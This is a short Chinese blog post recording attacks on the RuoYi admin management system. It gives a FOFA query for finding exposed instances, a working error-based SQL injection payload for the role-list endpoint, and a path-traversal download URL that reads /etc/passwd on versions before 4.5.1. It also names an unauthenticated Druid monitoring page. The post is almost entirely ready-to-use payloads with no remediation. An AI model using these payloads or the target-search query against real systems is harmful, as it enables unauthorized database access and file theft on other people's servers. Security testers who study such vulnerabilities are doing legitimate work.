若依后台管理系统sql注入和未授权访问

做测试遇到的若依系统,记录下

FOFA:

app="若依-管理系统"

漏洞一:sql注入:

漏洞位置在"系统管理"里中的"角色管理中"
http://xxxxxxx/system/role/list

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

漏洞二:任意文件下载

影响版本:RuoYi < v4.5.1

若依管理系统后台任意文件读取

http://xxx/common/download/resource?resource/profile/…/…/…/…/etc/passwd

若依管理系统未授权访问

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

参考:https://blog.csdn.net/Guapichen/article/details/119212781

 

 
posted @   我有清茶与酒  阅读(5167)  评论(0编辑  收藏  举报
编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统
点击右上角即可分享
微信分享提示